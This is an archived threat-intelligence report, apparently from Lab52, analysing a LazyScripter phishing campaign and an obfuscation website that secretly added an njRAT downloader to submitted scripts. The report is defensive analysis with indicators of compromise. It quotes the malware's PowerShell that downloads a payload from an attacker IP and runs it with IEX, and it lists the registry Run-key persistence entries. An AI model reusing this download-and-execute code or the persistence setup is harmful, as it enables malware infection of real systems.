{ "id": "1bf13e7c-e3f3-4cc6-b39f-92fdfcea50bd", "created_at": "2026-04-06T00:06:44.871687Z", "updated_at": "2026-04-10T03:29:44.366259Z", "deleted_at": null, "sha1_hash": "bf5efce8fcd8ffaed57f5417139cdee681e26934", "title": "Very very lazy Lazyscripter’s scripts: double compromise in a single obfuscation", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1414398, "plain_text": "Very very lazy Lazyscripter’s scripts: double compromise in a\r\nsingle obfuscation\r\nPublished: 2022-03-09 · Archived: 2026-04-05 13:39:32 UTC\r\nIn July of 2021, we identified an infection campaign targeting important European entities. During this\r\ninvestigation we could identify the threat actor behind these attacks as LazyScripter, an emerging APT group\r\npointed by MalwareBytes in February 2021.\r\nThrough our analysis, we could track their activity with precise dates in 2021 based on their samples.\r\nFurthermore, we could extend the intelligence upon this threat actor by identifying a new malware among their\r\nTTPs, and also find new elements of the infrastructure.\r\nAdditionally, after the analysis of the samples, we discovered the usage of a free and popular online obfuscating\r\ntool for scripts, which would inject their own downloader for a njRAT sample within LazyScripter’s malware.\r\nMeaning that, if some entity happened to be compromised by a one of these samples of LazyScripter, they would\r\nprobably be compromised by two different threat actors.\r\nFor this campaign, the malicious actor used phishing emails as the initial vector, pretending to be relevant\r\ninternational entities such as the United Nations World Tourism Organization (UNWTO or the International Air\r\nTransport Association (IATA). In the malicious emails, the actor would usually attach three compressed files: a pdf\r\ndocument, and two JavaScript files.\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 1 of 12\n\nPDF document from spear phishing\r\nAfter the analysis of the first pdf document that ended up in our hands (“JOB NOTICE.pdf” – UNWTO) we did\r\nnot observed embedded code, or any malicious behavior. However, metadata revealed that it had been edited with\r\na PDF editor referred to as “Foxit” on July 13th 2021, less than a month before we identified this campaign.\r\nProducer: Foxit PhantomPDF Printer Version 9.6.0.1818\r\nCreationDate: Tue Nov 10 08:30:41 2020 CET\r\nModDate: Tue Jul 13 22:17:50 2021 CEST\r\nThe only technical element of real interest found in this document was the hyperlink in which the user is\r\nsuggested to click in order to obtain more information about the fake job offer at UNWTO.\r\nThis link will open a browser and contact the domain securessl.]fit which was registered on July 17th 2021 and\r\nresolves in the address 192.64.]119.125, associated with the provider/web-hosting Namecheap.\r\nIt has been observed that the final URL shows up as follows, after a redirection by an HTTP 302 response from\r\nthe server, not serving any file at the moment of the analysis, but suggesting it was supposed to serve a .zip file\r\n(though, we did not discard IP geofence):\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 2 of 12\n\nFinal HTTP response via hyperklink from PDF doc\r\nAfter the analysis of the HTTP traffic flow with this domain, the redirection is observed to be hidden behind a\r\ndomain which belongs to the duckdns service for dynamic domains resolutions:\r\nMiddle/Transitional HTTP request from PDF\r\nThis domain resolves in the IP address 66.29.]130.204. Even so, the redirection through this address uses TLS\r\nencryption, so it is not possible to know what has occurred during the communication until the final redirection,\r\nwhich ends with the previously shown HTTP 404 response code.\r\nNevertheless, it has been indeed observed how that same IP address is associated to the “server1” hostname in the\r\ndomain gowaymevps.]xyz (registered on May 12th 2021).\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 3 of 12\n\nFinal HTTP request from PDF\r\nTraffic capture for the PDF hyperlink\r\nThe other two files found along with this PDF at its arrival via phishing email have the exact same content (even\r\nsame hash) in spite of having a different name:\r\nLIST OF AVAILABLE JOBS.js\r\nSALARY AND HIRING CONDITIONS.js\r\nThis highly obfuscated JavaScript has the only purpose of dropping a second VBS script, which will be placed in\r\nthe following paths:\r\nC:\\Users\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\tk.vbs\r\nC:\\Users\\*\\AppData\\Roaming\\tk.vbs\r\nFor those samples where the VBS script was not dropped in the startup folder, the following persistence\r\nmechanism would be established using the registry keys:\r\nHKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\tk\r\nDetails: wscript.exe //B “C:\\Users\\Lucas\\AppData\\Roaming\\tk.vbs”\r\nHKU\\*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tk1\r\nDetails: wscript.exe //B “C:\\Users\\Lucas\\AppData\\Roaming\\tk.vbs”\r\nAnd here is where the real fun begins. In the initial behavior analysis of these next stage VBS samples, we\r\nobserved C2 contact through HTTP POST requests to the port 449 of the IP address 45.91.92.112 resolved from\r\nstub.]ignorelist.]com.\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 4 of 12\n\nAt this point we could find an attribution according to different reports, since the domain stub.]ignorelist.]com had\r\nbeen used by the group referred as LazyScripter in their previous campaign.\r\nThe HTTP request is made using the path “/is-ready” in the URI and it includes initial information about the\r\ninfected system within the User-Agent header value:\r\nVBS sample HTTP request\r\nFurthermore, we also observed that the vbs script also dropped to disk the following .lnk file:\r\nC:\\Users\\Lucas\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\windowsUpdate.lnk\r\nThis direct access points at the following Powershell execution:\r\n$NQJLOJWQ=(Get-ItemProperty HKCU:\\Software).Sat;\r\n$WASUXIQO=(Get-ItemProperty HKCU:\\Software).Dat;\r\n$NILSHSEJ=(Get-ItemProperty HKCU:\\Software).Gat;\r\n$MYG\r\nThe values of the registry keys which this command refers to contain this series of Powershell commands:\r\n[System.Net.WebClient]$webClient = New-Object System.Net.WebClient;\r\n[System.IO.Stream]$stream = $webClient.OpenRead(‘http://185. 81.157.186/NDA/199.png’);\r\n[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;\r\n[string]$results = $sr.ReadToEnd();\r\nIEX $results\r\nRegistry Keys set by VBS sample\r\nOur first impression was a little bit of a surprise since we just observed the sample establishing a second\r\npersistence in the same startup folder for an artifact (the lnk file) that would use a different C2.\r\nAfter deobfuscating the VBS script we could identify the malware sample as Houdini’s H-Worm, but preceded\r\nby an interesting line, still slightly obfuscated. This single line was responsible for this second kind of parallel\r\nbehavior (new persistence using the lnk file and a different C2).\r\nWhile the first mentioned IP addresses and domains or the infection chain were not easily linked to malicious\r\nactivity through OSINT, this last one was quickly tagged as malicious everywhere.\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 5 of 12\n\nOSINT results for suspicious IP address\r\nNow it started to get even more interesting as we also discovered that, even though no domain points at this IP\r\naddress at this time, it used to resolve from the hackfree.]org domain, which belongs to top 1 million, and seems to\r\nbe some web service for offensive operations/techniques:\r\nDNS resolutions on suspicious IP address\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 6 of 12\n\nGoogle results for hackfree.]org\r\nSince this finding could be a little confusing as it was for us, let’s go back to the dropped VBS script. This script\r\nwill be the one which implements the RAT identified as H-worm after a complex nested obfuscation, prepended\r\nwith a confusing extra line.\r\nPart of such obfuscation implied the creation of a new script object which will execute the deobfuscate code. For\r\nthis purpose, the first part of the logic consists in identifying the architecture of the infected system, and then\r\ncreating nested ScriptControl objects, where the code which implements the totality of H-worm will be added.\r\nSuch code is read from an array which must be necessarily located in the last line of the file, commented, and\r\nwhich contains a total of 16.153 obfuscated elements.\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 7 of 12\n\nContent of VBS sample (tk.vbs)\r\ntk.vbs deobfuscated\r\nNow, we could know that this VBS script acted as some sort of loader for the final stage artifact, which was fully\r\nimplemented in the aforementioned last line, supposed to be a commented line in VBS. In order to compare the\r\ndifferent samples that we gathered, we implemented an automatic deobfuscator to straightly obtain the\r\ndeobfuscated code implemented in the commented line and we always found this first line prepended before the\r\nH-worm code.\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 8 of 12\n\nFinal VBS payload (H-Worm)\r\nBefore analyzing this extra suspicious code, which we could corroborate it was not part of the known source code\r\nfor H-Worm, the obvious thought was that these lines were added by the LazyScripter criminals and that they\r\nwere placing dates in the script for their own reasons. However, it still seemed weird that they would reward the\r\nthreat/forensic analysts with a precise date for each sample.\r\nAfter the analysis of the snippets, we observed that the samples would compare the current date with the\r\nhardcoded date, and if the hardcoded day arrived or passed, it would execute a specific function appended at the\r\nend of H-Worm’s code. This function would only drop the previously described .lnk file and set the mentioned\r\nregistry key values so as to download a sample of njRAT. Even though the author of H-Worm, known as\r\n“Houdini” had been connected to the development of njRAT, we knew this wasn’t part of the known\r\nimplementation for H-Worm, and still looked odd as a TTP from the same infection campaign.\r\nTrying to make sense out of it, we had the brainwave of using the information we had about this parallel behavior\r\nand make a quick check: We previously found out that they might have been using hackfree.]org as an online\r\nobfuscation service for VBS script, so we created our own dummy VBS script and submitted it to hackfree for\r\nobfuscation. Then we applied our implemented deobfuscator.\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 9 of 12\n\nImplemented dummy VBS script\r\nDummy VBS script obfuscated via hackfree website\r\nDeobfuscation of obfuscated dummy VBS script\r\nAt this point, we discovered that hackfree].org was injecting their own malware in every obfuscated script via\r\ntheir website, and this would lead in a double infection for malware obfuscated with hackfree.]org, or a first\r\n“sneaky” infection for those scripts that were obfuscated for legitimate purposes. At this last scenario we could\r\nconfirm that hackfree.]org would be a waterhole attack.\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 10 of 12\n\nFinally, back to the tracked threat actor, we could distinguish between LazyScripter’s indicators of compromise,\r\nand HackFree’s IOCs, resulting in the following diagram for this LazyScripter campaign main infrastructure and\r\ninfection chain.\r\nLazyScripter’s H-Worm campaign’s main infrastructure\r\nIOCs\r\n0fc8d0c3b6ab22533153b7296e597312fc8cf02e2ea92de226d93c09eaf8e579 SHA256\r\n77afef33c249d4d7bb076079eff1cca2aef272c84720e7f258435728be3bf049 SHA256\r\n82f6c8b52103272fcfb27ac71bd4bff76ee970dd16e5cdf3d0cfb75d10aa0609 SHA256\r\n5803ded992498b5bd5045095ca1eab33be8a4f9d785fdfc8b231127edf049e72 SHA256\r\nf5359df2aaa02fbfae540934f3e8f8a2ab362f7ee92dda536846afb67cea1b02 SHA256\r\nc685897eb3f32ced2b6e404e424ca01d0bc8c88b83da067fbef7e7fe889cffad SHA256\r\n23ea10f4b1a73a4e8b13466fff8983110216779d2d3cefe1fc151c6bb65c3b42 SHA256\r\n45.91.92.112:449 C2\r\n185.81.157.186 C2\r\n192.64.119.125 C2\r\n157.245.250.76 C2\r\n66.29.130.204 C2\r\n147.182.192.241 C2\r\n103.73.64.115 C2\r\nhttp://185.81.]157.186/NDA/199.png URI\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 11 of 12\n\nhttp://157.245.]250.76/MORE%20INFORMATION%20ON%20OFFERS.zip URI\r\nstub.]ignorelist.com\r\nC2\r\nDomain\r\nsecuressl.]fit\r\nC2\r\nDomain\r\ngowaymevps.]xyz\r\nC2\r\nDomain\r\nmilla.publicvm.]com\r\nC2\r\nDomain\r\ninternetexploraldon.]sytes.net\r\nC2\r\nDomain\r\njbizgsvhzj22evqon9ezz8bmbupp1s6cprmriam1.duckdns.]org\r\nC2\r\nDomain\r\nsaqicpcgflrlgxgoxxzkbfrjuisbkozeqrmthrzo.duckdns.]org\r\nC2\r\nDomain\r\nu1153246fov.ha004.t.justns.]ru\r\nC2\r\nDomain\r\nHKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\tk Reg Key\r\nHKU*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tk Reg Key\r\nC:\\Users\\Lucas\\AppData\\Roaming\\Microsoft\\Windows\\Start\r\nMenu\\Programs\\Startup\\windowsUpdate.lnk\r\nFile\r\npersistence\r\nCustomers with Lab52’s APT intelligence private feed service already have more tools and means of detection for\r\nthis campaign.\r\nIn case of having threat hunting service or being client of S2Grupo CERT, this intelligence has already been\r\napplied.\r\nIf you need more information about Lab52’s private APT intelligence feed service, you can contact us through the\r\nfollowing link\r\nSource: https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nhttps://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://lab52.io/blog/very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation/" ], "report_names": [ "very-very-lazy-lazyscripters-scripts-double-compromise-in-a-single-obfuscation" ], "threat_actors": [ { "id": "b20281dd-8cc4-4284-b85c-f98c7e09ae48", "created_at": "2022-10-25T15:50:23.642844Z", "updated_at": "2026-04-10T02:00:05.392724Z", "deleted_at": null, "main_name": "LazyScripter", "aliases": [ "LazyScripter" ], "source_name": "MITRE:LazyScripter", "tools": [ "Remcos", "QuasarRAT", "njRAT", "ngrok", "Koadic", "KOCTOPUS" ], "source_id": "MITRE", "reports": null }, { "id": "712fc9fa-4283-431b-882c-5e0de9c12452", "created_at": "2022-10-25T16:07:23.770209Z", "updated_at": "2026-04-10T02:00:04.745132Z", "deleted_at": null, "main_name": "LazyScripter", "aliases": [ "G0140" ], "source_name": "ETDA:LazyScripter", "tools": [ "Adwind", "Adwind RAT", "Alien Spy", "AlienSpy", "Bladabindi", "CinaRAT", "EmPyre", "EmpireProject", "Empoder", "Frutas", "Gussdoor", "Invoke-Ngrok", "JBifrost RAT", "JSocket", "Jorik", "KOCTOPUS", "Koadic", "Luminosity RAT", "LuminosityLink", "Nishang", "PowerShell Empire", "Quasar RAT", "QuasarRAT", "Remcos", "RemcosRAT", "Remote Manipulator System", "Remvio", "RuRAT", "Sockrat", "Socmer", "Trojan.Maljava", "UnReCoM", "Unknown RAT", "Unrecom", "Yggdrasil", "jBiFrost", "jConnectPro RAT", "jFrutas", "njRAT" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434004, "ts_updated_at": 1775791784, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bf5efce8fcd8ffaed57f5417139cdee681e26934.pdf", "text": "https://archive.orkl.eu/bf5efce8fcd8ffaed57f5417139cdee681e26934.txt", "img": "https://archive.orkl.eu/bf5efce8fcd8ffaed57f5417139cdee681e26934.jpg" } }